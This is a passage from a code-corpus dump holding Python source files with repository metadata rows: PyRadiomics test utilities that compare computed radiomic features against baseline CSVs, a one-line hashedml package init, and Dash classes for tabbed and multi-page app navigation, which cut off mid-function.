Only (re)loads an image/mask if the test case has changed, or the change of feature class causes a change in test
settings.
If feature class and test case are unchanged, nothing is reloaded and function returns False. If either feature
class or test case is changed, function returns True.
"""
global TEST_CASES
if self._featureClassName == className and self._test == test:
return False
self._test = test
self._testedSet.add(self._test)
# First set featureClass if necessary, because if settings have changed, testCase needs te be reloaded
if self._featureClassName != className:
self._logger.debug('Setting feature class name to %s', className)
assert className in self._baseline.keys() # Check if a baseline has been read for this class
self._featureClassName = className
# Check if test settings have changed
if self._current_config != self._baseline[className].getTestConfig(test):
self._current_config = self._baseline[className].getTestConfig(test)
self._testCase = None # forces image to be reloaded (as settings have changed)
# Next, set testCase if necessary
if self._testCase != self._current_config['TestCase']:
self._testCase = self._current_config['TestCase']
self._logger.info("Reading the image and mask for test case %s", self._testCase)
assert self._current_config['TestCase'] in TEST_CASES
imageName, maskName = getTestCase(self._testCase)
assert imageName is not None
assert maskName is not None
self._image = sitk.ReadImage(imageName)
self._mask = sitk.ReadImage(maskName)
if 'ImageHash' in self._current_config:
assert sitk.Hash(self._image) == self._current_config['ImageHash']
if 'MaskHash' in self._current_config:
assert sitk.Hash(self._mask) == self._current_config['MaskHash']
settings = self._current_config.get('Settings', {})
interpolator = settings.get('interpolator', sitk.sitkBSpline)
resampledPixelSpacing = settings.get('resampledPixelSpacing', None)
if interpolator is not None and resampledPixelSpacing is not None:
self._image, self._mask = imageoperations.resampleImage(self._image,
self._mask,
resampledPixelSpacing,
interpolator,
settings.get('label', 1),
settings.get('padDistance', 5))
self._bb, correctedMask = imageoperations.checkMask(self._image, self._mask, **settings)
if correctedMask is not None:
self._mask = correctedMask
self._imageType = None
return True
def getImage(self, imageType):
if self._imageType != imageType:
self._applyFilter(imageType)
return self._current_image
def getMask(self, imageType):
if self._imageType != imageType:
self._applyFilter(imageType)
return self._current_mask
def _applyFilter(self, imageType):
if imageType == 'original':
self._current_image, self._current_mask = imageoperations.cropToTumorMask(self._image, self._mask, self._bb)
else:
raise NotImplementedError()
self._imageType = imageType
def getSettings(self):
return self._current_config.get('Settings', {})
def checkResult(self, featureName, value):
"""
Use utility methods to get and test the results against the expected baseline value for this key.
"""
longName = '_'.join(featureName)
if value is None:
self._diffs[self._test][longName] = None
self._results[self._test][longName] = None
assert (value is not None)
if math.isnan(value):
self._diffs[self._test][longName] = numpy.nan
self._results[self._test][longName] = numpy.nan
assert (not math.isnan(value))
# save the result using the baseline class and feature names
self._logger.debug('checkResults: featureName = %s', featureName)
self._results[self._test][longName] = value
baselineValue = self._baseline[self._featureClassName].getBaselineValue(self._test, longName)
assert baselineValue is not None
baselineValue = float(baselineValue)
self._logger.debug('checkResults: for featureName %s, got baseline value = %f', featureName, baselineValue)
if baselineValue == 0.0:
# avoid divide by zero, the difference is either 0% if the value is also zero, or 100%
if value - baselineValue == 0.0:
percentDiff = 0.0
else:
percentDiff = 1.0
else:
percentDiff = abs(1.0 - (value / baselineValue))
# save the difference
self._diffs[self._test][longName] = percentDiff
# check for a less than three percent difference
if (percentDiff >= 0.03):
self._logger.error('checkResult %s, baseline value = %f, calculated = %f, diff = %f%%', featureName,
float(baselineValue), value, percentDiff * 100)
assert (percentDiff < 0.03)
def getResults(self):
return self._results
def getDiffs(self):
return self._diffs
def getDataDir(self):
return self._dataDir
def writeCSV(self, data, fileName):
"""
Write out data in a csv file.
Assumes a data structure with:
{'id1' : {'f1':n1, 'f2':n2}, 'id2' : {'f1':n3, 'f2':n4}}
"""
# Get the headers from the first testCase in _testedSet
# If no tests were run, the length of _testedSet will be 0, and no files should be written
if len(self._testedSet) > 0:
with open(fileName, 'w') as csvFile:
csvFileWriter = csv.writer(csvFile, lineterminator='\n')
testedCases = sorted(self._testedSet)
header = sorted(data[testedCases[0]].keys())
header = ['testCase'] + header
csvFileWriter.writerow(header)
for testCase in testedCases:
thisCase = data[testCase]
thisCase['testCase'] = testCase
row = []
for h in header:
row = row + [thisCase.get(h, "N/A")]
csvFileWriter.writerow(row)
self._logger.info('Wrote to file %s', fileName)
else:
self._logger.info('No test cases run, aborting file write to %s', fileName)
class PyRadiomicsBaseline:
def __init__(self, featureClassName):
self.logger = logging.getLogger('radiomics.testing.baseline')
self.cls = featureClassName
self.configuration = {}
self.baseline = {}
self.tests = set()
@classmethod
def readBaselineFile(cls, baselineFile):
featureClassName = os.path.basename(baselineFile)[9:-4]
new_baseline = cls(featureClassName)
new_baseline.logger.debug('Reading baseline for class %s', new_baseline.cls)
with open(baselineFile, 'r' if six.PY3 else 'rb') as baselineReader:
csvReader = csv.reader(baselineReader)
tests = six.next(csvReader)[1:]
for case in tests:
new_baseline.configuration[case] = {}
new_baseline.baseline[case] = {}
for testRow in csvReader:
for case_idx, case in enumerate(tests, start=1):
if 'general_info' in testRow[0]:
new_baseline.configuration[case][testRow[0]] = testRow[case_idx]
else:
new_baseline.baseline[case][testRow[0]] = testRow[case_idx]
new_baseline.tests = set(tests)
return new_baseline
def getTestConfig(self, test):
if test not in self.configuration:
return {} # This test is not present in the baseline for this class
config = {
'TestCase': self.configuration[test].get('general_info_TestCase', None),
'Settings': ast.literal_eval(self.configuration[test].get('general_info_GeneralSettings', '{}')),
}
if 'general_info_ImageHash' in self.configuration[test]:
config['ImageHash'] = self.configuration[test]['general_info_ImageHash']
if 'general_info_MaskHash' in self.configuration[test]:
config['MaskHash'] = self.configuration[test]['general_info_MaskHash']
if config['TestCase'] is None:
self.logger.error('Missing key "general_info_TestCase". Cannot configure!')
return None
return config
def getTestFeatures(self, test):
"""
Gets all features for which a baseline value is available for the current class and test case. Returns a list
containing the feature names.
"""
if test not in self.baseline:
return None # This test is not present in the baseline for this class
return list(self.baseline[test].keys())
def getBaselineValue(self, test, featureName):
if test not in self.baseline:
return None
return self.baseline[test].get(featureName, None)
def writeBaselineFile(self, baselineDir):
baselineFile = os.path.join(baselineDir, 'baseline_%s.csv' % self.cls)
testCases = list(self.baseline.keys())
with open(baselineFile, 'wb') as baseline:
csvWriter = csv.writer(baseline)
header = ['featureName'] + testCases
csvWriter.writerow(header)
config = self.configuration[testCases[0]].keys()
for c in config:
row = [c]
for testCase in testCases:
row.append(str(self.configuration[testCase].get(c, '')))
csvWriter.writerow(row)
features = self.baseline[testCases[0]].keys()
for f in features:
row = [f]
for testCase in testCases:
row.append(str(self.baseline[testCase].get(f, '')))
csvWriter.writerow(row)
| 36.228792
| 122
| 0.67679
|
import ast
import csv
import logging
import math
import os
from nose_parameterized import parameterized
import numpy
import SimpleITK as sitk
import six
from radiomics import getTestCase, imageoperations
logger = logging.getLogger('radiomics.testing')
TEST_CASES = ('brain1', 'brain2', 'breast1', 'lung1', 'lung2')
def custom_name_func(testcase_func, param_num, param):
global logger
logger.debug('custom_name_func: function name = %s, param_num = {0:0>3}, param.args = %s'.format(param_num),
testcase_func.__name__, param.args)
return str("%s_%s" % (
testcase_func.__name__,
parameterized.to_safe_name("_".join(str(x) for x in param.args)),
))
class RadiomicsTestUtils:
def __init__(self):
self._logger = logging.getLogger('radiomics.testing.utils')
self._logger.debug('RadiomicsTestUtils')
self._image = None
self._mask = None
self._current_image = None
self._current_mask = None
self._bb = None
self._imageType = None
self._dataDir = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", "data")
self._baselineDir = os.path.join(self._dataDir, 'baseline')
self._tests = set()
self._test = None
self._testCase = None
self._testedSet = set()
self._baseline = {}
self.readBaselineFiles()
self._current_config = {}
self._featureClassName = None
self._results = {}
self._diffs = {}
for test in self.getTests():
self._results[test] = {}
self._diffs[test] = {}
def readBaselineFiles(self):
baselineFiles = [fileName for fileName in os.listdir(self._baselineDir)
if os.path.isfile(os.path.join(self._baselineDir, fileName)) and fileName.startswith('baseline_')]
assert len(baselineFiles) > 0
for baselineFile in baselineFiles:
newBaseline = PyRadiomicsBaseline.readBaselineFile(os.path.join(self._baselineDir, baselineFile))
cls = newBaseline.cls
self._logger.debug('Read baseline for class %s', cls)
self._baseline[cls] = newBaseline
self._tests |= newBaseline.tests
def getTests(self):
return self._tests
def getFeatureNames(self, className, test):
if className not in self._baseline:
return None
return self._baseline[className].getTestFeatures(test)
def setFeatureClassAndTestCase(self, className, test):
global TEST_CASES
if self._featureClassName == className and self._test == test:
return False
self._test = test
self._testedSet.add(self._test)
if self._featureClassName != className:
self._logger.debug('Setting feature class name to %s', className)
assert className in self._baseline.keys()
self._featureClassName = className
if self._current_config != self._baseline[className].getTestConfig(test):
self._current_config = self._baseline[className].getTestConfig(test)
self._testCase = None
if self._testCase != self._current_config['TestCase']:
self._testCase = self._current_config['TestCase']
self._logger.info("Reading the image and mask for test case %s", self._testCase)
assert self._current_config['TestCase'] in TEST_CASES
imageName, maskName = getTestCase(self._testCase)
assert imageName is not None
assert maskName is not None
self._image = sitk.ReadImage(imageName)
self._mask = sitk.ReadImage(maskName)
if 'ImageHash' in self._current_config:
assert sitk.Hash(self._image) == self._current_config['ImageHash']
if 'MaskHash' in self._current_config:
assert sitk.Hash(self._mask) == self._current_config['MaskHash']
settings = self._current_config.get('Settings', {})
interpolator = settings.get('interpolator', sitk.sitkBSpline)
resampledPixelSpacing = settings.get('resampledPixelSpacing', None)
if interpolator is not None and resampledPixelSpacing is not None:
self._image, self._mask = imageoperations.resampleImage(self._image,
self._mask,
resampledPixelSpacing,
interpolator,
settings.get('label', 1),
settings.get('padDistance', 5))
self._bb, correctedMask = imageoperations.checkMask(self._image, self._mask, **settings)
if correctedMask is not None:
self._mask = correctedMask
self._imageType = None
return True
def getImage(self, imageType):
if self._imageType != imageType:
self._applyFilter(imageType)
return self._current_image
def getMask(self, imageType):
if self._imageType != imageType:
self._applyFilter(imageType)
return self._current_mask
def _applyFilter(self, imageType):
if imageType == 'original':
self._current_image, self._current_mask = imageoperations.cropToTumorMask(self._image, self._mask, self._bb)
else:
raise NotImplementedError()
self._imageType = imageType
def getSettings(self):
return self._current_config.get('Settings', {})
def checkResult(self, featureName, value):
longName = '_'.join(featureName)
if value is None:
self._diffs[self._test][longName] = None
self._results[self._test][longName] = None
assert (value is not None)
if math.isnan(value):
self._diffs[self._test][longName] = numpy.nan
self._results[self._test][longName] = numpy.nan
assert (not math.isnan(value))
self._logger.debug('checkResults: featureName = %s', featureName)
self._results[self._test][longName] = value
baselineValue = self._baseline[self._featureClassName].getBaselineValue(self._test, longName)
assert baselineValue is not None
baselineValue = float(baselineValue)
self._logger.debug('checkResults: for featureName %s, got baseline value = %f', featureName, baselineValue)
if baselineValue == 0.0:
if value - baselineValue == 0.0:
percentDiff = 0.0
else:
percentDiff = 1.0
else:
percentDiff = abs(1.0 - (value / baselineValue))
self._diffs[self._test][longName] = percentDiff
if (percentDiff >= 0.03):
self._logger.error('checkResult %s, baseline value = %f, calculated = %f, diff = %f%%', featureName,
float(baselineValue), value, percentDiff * 100)
assert (percentDiff < 0.03)
def getResults(self):
return self._results
def getDiffs(self):
return self._diffs
def getDataDir(self):
return self._dataDir
def writeCSV(self, data, fileName):
if len(self._testedSet) > 0:
with open(fileName, 'w') as csvFile:
csvFileWriter = csv.writer(csvFile, lineterminator='\n')
testedCases = sorted(self._testedSet)
header = sorted(data[testedCases[0]].keys())
header = ['testCase'] + header
csvFileWriter.writerow(header)
for testCase in testedCases:
thisCase = data[testCase]
thisCase['testCase'] = testCase
row = []
for h in header:
row = row + [thisCase.get(h, "N/A")]
csvFileWriter.writerow(row)
self._logger.info('Wrote to file %s', fileName)
else:
self._logger.info('No test cases run, aborting file write to %s', fileName)
class PyRadiomicsBaseline:
def __init__(self, featureClassName):
self.logger = logging.getLogger('radiomics.testing.baseline')
self.cls = featureClassName
self.configuration = {}
self.baseline = {}
self.tests = set()
@classmethod
def readBaselineFile(cls, baselineFile):
featureClassName = os.path.basename(baselineFile)[9:-4]
new_baseline = cls(featureClassName)
new_baseline.logger.debug('Reading baseline for class %s', new_baseline.cls)
with open(baselineFile, 'r' if six.PY3 else 'rb') as baselineReader:
csvReader = csv.reader(baselineReader)
tests = six.next(csvReader)[1:]
for case in tests:
new_baseline.configuration[case] = {}
new_baseline.baseline[case] = {}
for testRow in csvReader:
for case_idx, case in enumerate(tests, start=1):
if 'general_info' in testRow[0]:
new_baseline.configuration[case][testRow[0]] = testRow[case_idx]
else:
new_baseline.baseline[case][testRow[0]] = testRow[case_idx]
new_baseline.tests = set(tests)
return new_baseline
def getTestConfig(self, test):
if test not in self.configuration:
return {}
config = {
'TestCase': self.configuration[test].get('general_info_TestCase', None),
'Settings': ast.literal_eval(self.configuration[test].get('general_info_GeneralSettings', '{}')),
}
if 'general_info_ImageHash' in self.configuration[test]:
config['ImageHash'] = self.configuration[test]['general_info_ImageHash']
if 'general_info_MaskHash' in self.configuration[test]:
config['MaskHash'] = self.configuration[test]['general_info_MaskHash']
if config['TestCase'] is None:
self.logger.error('Missing key "general_info_TestCase". Cannot configure!')
return None
return config
def getTestFeatures(self, test):
if test not in self.baseline:
return None
return list(self.baseline[test].keys())
def getBaselineValue(self, test, featureName):
if test not in self.baseline:
return None
return self.baseline[test].get(featureName, None)
def writeBaselineFile(self, baselineDir):
baselineFile = os.path.join(baselineDir, 'baseline_%s.csv' % self.cls)
testCases = list(self.baseline.keys())
with open(baselineFile, 'wb') as baseline:
csvWriter = csv.writer(baseline)
header = ['featureName'] + testCases
csvWriter.writerow(header)
config = self.configuration[testCases[0]].keys()
for c in config:
row = [c]
for testCase in testCases:
row.append(str(self.configuration[testCase].get(c, '')))
csvWriter.writerow(row)
features = self.baseline[testCases[0]].keys()
for f in features:
row = [f]
for testCase in testCases:
row.append(str(self.baseline[testCase].get(f, '')))
csvWriter.writerow(row)
| true
| true
|
790b1cc2ae9747fb1d318f5abee1e2f3ba74b24c
| 32
|
py
|
Python
|
hashedml/__init__.py
|
mtingers/hashedml
|
e87f25bec719c9cce13552abb15379f6e54e563a
|
[
"MIT"
] | 1
|
2022-01-09T10:41:42.000Z
|
2022-01-09T10:41:42.000Z
|
hashedml/__init__.py
|
mtingers/hashedml
|
e87f25bec719c9cce13552abb15379f6e54e563a
|
[
"MIT"
] | null | null | null |
hashedml/__init__.py
|
mtingers/hashedml
|
e87f25bec719c9cce13552abb15379f6e54e563a
|
[
"MIT"
] | null | null | null |
from hashedml.hashedml import *
| 16
| 31
| 0.8125
|
from hashedml.hashedml import *
| true
| true
|
790b1d0ff85b035438d20cac86138e09048cf9f7
| 13,863
|
py
|
Python
|
dash_charts/utils_app_with_navigation.py
|
KyleKing/dash_charts
|
8e3644505047fa85f3175f5bc55a2421cb0a19ea
|
[
"Unlicense"
] | 16
|
2020-02-22T00:51:54.000Z
|
2022-03-03T21:45:51.000Z
|
dash_charts/utils_app_with_navigation.py
|
KyleKing/dash_charts
|
8e3644505047fa85f3175f5bc55a2421cb0a19ea
|
[
"Unlicense"
] | 29
|
2020-06-29T22:14:00.000Z
|
2022-03-22T02:10:00.000Z
|
dash_charts/utils_app_with_navigation.py
|
KyleKing/dash_charts
|
8e3644505047fa85f3175f5bc55a2421cb0a19ea
|
[
"Unlicense"
] | 1
|
2022-02-03T09:07:07.000Z
|
2022-02-03T09:07:07.000Z
|
"""Classes for more complex applications that have tabbed or paged navigation."""
from collections import OrderedDict
from copy import deepcopy
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from implements import implements
from .utils_app import AppBase, AppInterface
TODO_CLIENT_CALLBACK = '''
TODO: Create clientside callbacks dynamically to update the title on navigation
See: http://dash.plotly.com/external-resources
```py
app.clientside_callback(
"""
function(tab_value) {
if (tab_value === 'tab-1') {
document.title = 'Tab 1'
} else if (tab_value === 'tab-2') {
document.title = 'Tab 2'
}
}
""",
Output('blank-output', 'children'),
[Input('tabs-example', 'value')]
)
```
'''
# TODO: Try to see if I can resolve the interface differences or if I need make a subclass interface
# @implements(AppInterface) # noqa: H601
class AppWithNavigation(AppBase):
"""Base class for building Dash Application with tabs or URL routing."""
app = None
"""Main Dash application to pass to all child tabs."""
nav_lookup = None
"""OrderedDict based on the list of tuples from `self.define_nav_elements()`."""
nav_layouts = None
"""Dictionary with nav_names as keys and corresponding layout as value."""
def define_nav_elements(self):
"""Return list of initialized pages or tabs accordingly.
Should return, list: each item is an initialized app (ex `[AppBase(self.app)]` in the order each tab is rendered
Raises:
NotImplementedError: Child class must implement this method
"""
raise NotImplementedError('define_nav_elements must be implemented by child class') # pragma: no cover
def create(self, **kwargs):
"""Create each navigation componet, storing the layout. Then parent class to create application.
Args:
kwargs: keyword arguments passed to `self.create`
"""
# Initialize the lookup for each tab then configure each tab
self.nav_lookup = OrderedDict([(tab.name, tab) for tab in self.define_nav_elements()])
self.nav_layouts = {}
for nav_name, nav in self.nav_lookup.items():
nav.create(assign_layout=False)
self.nav_layouts[nav_name] = nav.return_layout()
# Store validation_layout that is later used for callback verification in base class
self.validation_layout = [*map(deepcopy, self.nav_layouts.values())]
# Initialize parent application that handles navigation
super().create(**kwargs)
def initialization(self) -> None:
"""Initialize ids with `self.register_uniq_ids([...])` and other one-time actions."""
super().initialization()
self.register_uniq_ids(self.app_ids)
def create_elements(self) -> None:
"""Override method as not needed at navigation-level."""
... # pragma: no cover
def create_callbacks(self) -> None:
"""Override method as not needed at navigation-level."""
... # pragma: no cover
@implements(AppInterface) # noqa: H601
class StaticTab(AppBase):
"""Simple App without charts or callbacks."""
basic_style = {
'marginLeft': 'auto',
'marginRight': 'auto',
'maxWidth': '1000px',
'paddingTop': '10px',
}
def initialization(self) -> None:
"""Initialize ids with `self.register_uniq_ids([...])` and other one-time actions."""
super().initialization()
self.register_uniq_ids(['N/A'])
def create_elements(self) -> None:
"""Initialize the charts, tables, and other Dash elements.."""
...
def create_callbacks(self) -> None:
"""Register callbacks necessary for this tab."""
...
class AppWithTabs(AppWithNavigation):
"""Base class for building Dash Application with tabs."""
# App ids
id_tabs_content = 'tabs-wrapper'
id_tabs_select = 'tabs-content'
app_ids = [id_tabs_content, id_tabs_select]
"""List of all ids for the top-level tab view. Will be mapped to `self._il` for globally unique ids."""
def return_layout(self) -> dict:
"""Return Dash application layout.
Returns:
dict: Dash HTML object
"""
tabs = [dcc.Tab(label=name, value=name) for name, tab in self.nav_lookup.items()]
return html.Div(
children=[
dcc.Tabs(
id=self._il[self.id_tabs_select], value=list(self.nav_lookup.keys())[0],
children=tabs,
),
html.Div(id=self._il[self.id_tabs_content]),
],
)
def create_callbacks(self) -> None:
"""Register the navigation callback."""
outputs = [(self.id_tabs_content, 'children')]
inputs = [(self.id_tabs_select, 'value')]
@self.callback(outputs, inputs, [])
def render_tab(tab_name):
return [self.nav_layouts[tab_name]]
# > PLANNED: Make the tabs and chart compact as well when the compact argument is set to True
class FullScreenAppWithTabs(AppWithTabs): # noqa: H601
"""Base class for building Dash Application with tabs that uses the full window."""
tabs_location = 'left'
"""Tab orientation setting. One of `(left, top, bottom, right)`."""
tabs_margin = '10%'
"""Adjust this setting based on the width or height of the tabs to prevent the content from overlapping the tabs."""
tabs_compact = False
"""Boolean setting to toggle between a padded tab layout if False and a minimal compact version if True."""
def verify_app_initialization(self):
"""Check that the app was properly initialized.
Raises:
RuntimeError: if child class has not called `self.register_uniq_ids`
"""
super().verify_app_initialization()
allowed_locations = ('left', 'top', 'bottom', 'right')
if self.tabs_location not in allowed_locations: # pragma: no cover
raise RuntimeError(f'`self.tabs_location = {self.tabs_location}` is not in {allowed_locations}')
def return_layout(self) -> dict:
"""Return Dash application layout.
Returns:
dict: Dash HTML object
"""
return html.Div(
children=[
self.tab_menu(),
html.Div(
style={f'margin-{self.tabs_location}': self.tabs_margin},
children=[html.Div(id=self._il[self.id_tabs_content])],
),
],
)
def generate_tab_kwargs(self):
"""Create the tab keyword arguments. Intended to be modified through inheritance.
Returns:
tuple: keyword arguments and styling for the dcc.Tab elements
- tab_kwargs: with at minimum keys `(style, selected_style)` for dcc.Tab
- tabs_kwargs: to be passed to dcc.Tabs
- tabs_style: style for the dcc.Tabs HTML element
"""
# Unselected tab style
if self.tabs_compact:
tab_style = {'padding': '2px 4px 2px 4px'}
tabs_padding = '6px 0 0 2px'
else:
tab_style = {'padding': '10px 20px 10px 20px'}
tabs_padding = '15px 0 0 5px'
# Extend tab style for selected case
selected_style = deepcopy(tab_style)
opposite_lookup = {'top': 'bottom', 'bottom': 'top', 'left': 'right', 'right': 'left'}
tabs_style = { # noqa: ECE001
'backgroundColor': '#F9F9F9',
'padding': tabs_padding,
'position': 'fixed',
'zIndex': '999',
f'border{opposite_lookup[self.tabs_location].title()}': '1px solid #d6d6d6',
self.tabs_location: '0',
}
if self.tabs_location in ['left', 'right']:
# Configure for vertical case
selected_style['border-left'] = '3px solid #119DFF'
tabs_kwargs = {
'vertical': True,
'style': {'width': '100%'},
'parent_style': {'width': '100%'},
}
tabs_style['top'] = '0'
tabs_style['bottom'] = '0'
tabs_style['width'] = 'auto'
else:
# Configure for horizontal case
selected_style['border-top'] = '3px solid #119DFF'
tabs_kwargs = {}
tabs_style['height'] = 'auto'
tabs_style['right'] = '0'
tabs_style['left'] = '0'
tab_kwargs = {'style': tab_style, 'selected_style': selected_style}
return (tab_kwargs, tabs_kwargs, tabs_style)
def tab_menu(self):
"""Return the HTML elements for the tab menu.
Returns:
dict: Dash HTML object
"""
tab_kwargs, tabs_kwargs, tabs_style = self.generate_tab_kwargs()
tabs = [dcc.Tab(label=name, value=name, **tab_kwargs) for name, tab in self.nav_lookup.items()]
return html.Div(
children=[
dcc.Tabs(
id=self._il[self.id_tabs_select], value=list(self.nav_lookup.keys())[0],
children=tabs, **tabs_kwargs,
),
], style=tabs_style,
)
class AppMultiPage(AppWithNavigation): # noqa: H601
"""Base class for building Dash Application with multiple pages."""
navbar_links = None
"""Base class must create list of tuples `[('Link Name', '/link'), ]` to use default `self.nav_bar()`."""
dropdown_links = None
"""Base class must create list of tuples `[('Link Name', '/link'), ]` to use default `self.nav_bar()`."""
logo = None
"""Optional path to logo. If None, no logo will be shown in navbar."""
# App ids
id_url = 'pages-url'
id_pages_content = 'pages-wrapper'
id_toggler = 'nav-toggle'
id_collapse = 'nav-collapse'
app_ids = [id_url, id_pages_content, id_toggler, id_collapse]
"""List of all ids for the top-level pages view. Will be mapped to `self._il` for globally unique ids."""
def return_layout(self) -> dict:
"""Return Dash application layout.
Returns:
dict: Dash HTML object
"""
return html.Div(
children=[
dcc.Location(id=self._il[self.id_url], refresh=False),
self.nav_bar(),
html.Div(id=self._il[self.id_pages_content]),
],
)
def nav_bar(self):
"""Return the HTML elements for the navigation menu.
Returns:
dict: Dash HTML object
"""
# Create brand icon and name where icon in optional
brand = []
if self.logo:
brand.append(dbc.Col(html.Img(src=self.logo, height='25px')))
brand.append(dbc.Col(dbc.NavbarBrand(self.name, className='ml-2')))
# Create links in navbar and dropdown. Both are optional
links = []
if self.navbar_links:
links.append(
dbc.Nav(
children=[dbc.NavItem(dbc.NavLink(name, href=link)) for name, link in self.navbar_links],
fill=True,
navbar=True,
),
)
if self.dropdown_links:
links.append(
dbc.Nav(
dbc.DropdownMenu(
children=[dbc.DropdownMenuItem(name, href=link) for name, link in self.dropdown_links],
in_navbar=True,
label='Links',
nav=True,
),
navbar=True,
),
)
# Layout default navbar
return dbc.Navbar(
children=[
dbc.NavLink(
[
dbc.Row(
children=brand,
align='center',
no_gutters=True,
),
], href='/',
),
dbc.NavbarToggler(id=self._il[self.id_toggler]),
dbc.Collapse(
dbc.Row(
children=links,
no_gutters=True,
className='flex-nowrap mt-3 mt-md-0',
align='center',
),
id=self._il[self.id_collapse],
navbar=True,
),
],
sticky='top',
color='dark',
dark=True,
)
def create_callbacks(self) -> None:
"""Register the navigation callback."""
outputs = [(self.id_pages_content, 'children')]
inputs = [(self.id_url, 'pathname')]
@self.callback(outputs, inputs, [])
def render_page(pathname):
try:
# TODO: Demo how pages could use parameters from pathname
return [self.nav_layouts[self.select_page_name(pathname)]]
except Exception as err:
return [html.Div(children=[f'Error rendering "{pathname}":\n{err}'])]
@self.callback(
[(self.id_collapse, 'is_open')],
[(self.id_toggler, 'n_clicks')],
[(self.id_collapse, 'is_open')],
)
def toggle_navbar_collapse(n_clicks, is_open):
return [not is_open if n_clicks else is_open]
def select_page_name(self, pathname):
"""Return the page name determined based on the pathname.
Should return str: page name
Args:
pathname: relative pathname from URL
Raises:
NotImplementedError: Child class must implement this method
"""
raise NotImplementedError('nav_bar must be implemented by child class') # pragma: no cover
| 34.571072
| 120
| 0.572098
|
from collections import OrderedDict
from copy import deepcopy
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from implements import implements
from .utils_app import AppBase, AppInterface
TODO_CLIENT_CALLBACK = '''
TODO: Create clientside callbacks dynamically to update the title on navigation
See: http://dash.plotly.com/external-resources
```py
app.clientside_callback(
"""
function(tab_value) {
if (tab_value === 'tab-1') {
document.title = 'Tab 1'
} else if (tab_value === 'tab-2') {
document.title = 'Tab 2'
}
}
""",
Output('blank-output', 'children'),
[Input('tabs-example', 'value')]
)
```
'''
thNavigation(AppBase):
app = None
nav_lookup = None
nav_layouts = None
def define_nav_elements(self):
raise NotImplementedError('define_nav_elements must be implemented by child class')
def create(self, **kwargs):
self.nav_lookup = OrderedDict([(tab.name, tab) for tab in self.define_nav_elements()])
self.nav_layouts = {}
for nav_name, nav in self.nav_lookup.items():
nav.create(assign_layout=False)
self.nav_layouts[nav_name] = nav.return_layout()
self.validation_layout = [*map(deepcopy, self.nav_layouts.values())]
super().create(**kwargs)
def initialization(self) -> None:
super().initialization()
self.register_uniq_ids(self.app_ids)
def create_elements(self) -> None:
...
def create_callbacks(self) -> None:
...
@implements(AppInterface)
class StaticTab(AppBase):
basic_style = {
'marginLeft': 'auto',
'marginRight': 'auto',
'maxWidth': '1000px',
'paddingTop': '10px',
}
def initialization(self) -> None:
super().initialization()
self.register_uniq_ids(['N/A'])
def create_elements(self) -> None:
...
def create_callbacks(self) -> None:
...
class AppWithTabs(AppWithNavigation):
id_tabs_content = 'tabs-wrapper'
id_tabs_select = 'tabs-content'
app_ids = [id_tabs_content, id_tabs_select]
def return_layout(self) -> dict:
tabs = [dcc.Tab(label=name, value=name) for name, tab in self.nav_lookup.items()]
return html.Div(
children=[
dcc.Tabs(
id=self._il[self.id_tabs_select], value=list(self.nav_lookup.keys())[0],
children=tabs,
),
html.Div(id=self._il[self.id_tabs_content]),
],
)
def create_callbacks(self) -> None:
outputs = [(self.id_tabs_content, 'children')]
inputs = [(self.id_tabs_select, 'value')]
@self.callback(outputs, inputs, [])
def render_tab(tab_name):
return [self.nav_layouts[tab_name]]
class FullScreenAppWithTabs(AppWithTabs):
tabs_location = 'left'
tabs_margin = '10%'
tabs_compact = False
def verify_app_initialization(self):
super().verify_app_initialization()
allowed_locations = ('left', 'top', 'bottom', 'right')
if self.tabs_location not in allowed_locations:
raise RuntimeError(f'`self.tabs_location = {self.tabs_location}` is not in {allowed_locations}')
def return_layout(self) -> dict:
return html.Div(
children=[
self.tab_menu(),
html.Div(
style={f'margin-{self.tabs_location}': self.tabs_margin},
children=[html.Div(id=self._il[self.id_tabs_content])],
),
],
)
def generate_tab_kwargs(self):
if self.tabs_compact:
tab_style = {'padding': '2px 4px 2px 4px'}
tabs_padding = '6px 0 0 2px'
else:
tab_style = {'padding': '10px 20px 10px 20px'}
tabs_padding = '15px 0 0 5px'
selected_style = deepcopy(tab_style)
opposite_lookup = {'top': 'bottom', 'bottom': 'top', 'left': 'right', 'right': 'left'}
tabs_style = {
'backgroundColor': '#F9F9F9',
'padding': tabs_padding,
'position': 'fixed',
'zIndex': '999',
f'border{opposite_lookup[self.tabs_location].title()}': '1px solid #d6d6d6',
self.tabs_location: '0',
}
if self.tabs_location in ['left', 'right']:
selected_style['border-left'] = '3px solid #119DFF'
tabs_kwargs = {
'vertical': True,
'style': {'width': '100%'},
'parent_style': {'width': '100%'},
}
tabs_style['top'] = '0'
tabs_style['bottom'] = '0'
tabs_style['width'] = 'auto'
else:
selected_style['border-top'] = '3px solid #119DFF'
tabs_kwargs = {}
tabs_style['height'] = 'auto'
tabs_style['right'] = '0'
tabs_style['left'] = '0'
tab_kwargs = {'style': tab_style, 'selected_style': selected_style}
return (tab_kwargs, tabs_kwargs, tabs_style)
def tab_menu(self):
tab_kwargs, tabs_kwargs, tabs_style = self.generate_tab_kwargs()
tabs = [dcc.Tab(label=name, value=name, **tab_kwargs) for name, tab in self.nav_lookup.items()]
return html.Div(
children=[
dcc.Tabs(
id=self._il[self.id_tabs_select], value=list(self.nav_lookup.keys())[0],
children=tabs, **tabs_kwargs,
),
], style=tabs_style,
)
class AppMultiPage(AppWithNavigation):
navbar_links = None
dropdown_links = None
logo = None
id_url = 'pages-url'
id_pages_content = 'pages-wrapper'
id_toggler = 'nav-toggle'
id_collapse = 'nav-collapse'
app_ids = [id_url, id_pages_content, id_toggler, id_collapse]
def return_layout(self) -> dict:
return html.Div(
children=[
dcc.Location(id=self._il[self.id_url], refresh=False),
self.nav_bar(),
html.Div(id=self._il[self.id_pages_content]),
],
)
def nav_bar(self):
brand = []
if self.logo:
brand.append(dbc.Col(html.Img(src=self.logo, height='25px')))
brand.append(dbc.Col(dbc.NavbarBrand(self.name, className='ml-2')))
links = []
if self.navbar_links:
links.append(
dbc.Nav(
children=[dbc.NavItem(dbc.NavLink(name, href=link)) for name, link in self.navbar_links],
fill=True,
navbar=True,
),
)
if self.dropdown_links:
links.append(
dbc.Nav(
dbc.DropdownMenu(
children=[dbc.DropdownMenuItem(name, href=link) for name, link in self.dropdown_links],
in_navbar=True,
label='Links',
nav=True,
),
navbar=True,
),
)
return dbc.Navbar(
children=[
dbc.NavLink(
[
dbc.Row(
children=brand,
align='center',
no_gutters=True,
),
], href='/',
),
dbc.NavbarToggler(id=self._il[self.id_toggler]),
